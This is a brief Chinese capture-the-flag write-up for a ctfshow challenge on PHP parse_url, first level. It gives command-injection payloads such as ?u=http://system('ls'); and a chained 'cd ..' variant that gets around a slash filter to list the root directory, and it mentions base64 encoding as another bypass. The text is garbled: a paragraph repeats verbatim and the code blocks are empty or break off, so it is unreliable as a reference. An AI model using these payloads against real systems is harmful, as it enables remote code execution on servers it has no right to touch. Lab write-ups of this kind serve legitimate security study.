ctfshow大挑战–parse_url
第一关
1 |
|
直接执行host
直接?u=http://system('ls');
是可以的,但是想要读取根目录是不行的,因为含有/
可以:?u=http://system(‘cd ..;cd ..;cd ..;ls’);
或者使用base64编码
1 | <?php |
直接执行host
直接?u=http://system('ls');
是可以的,但是想要读取根目录是不行的,因为含有/
可以:?u=http://system(‘cd ..;cd ..;cd ..;ls’);
或者使用base64编码
1 | <? |
1 | import base64 |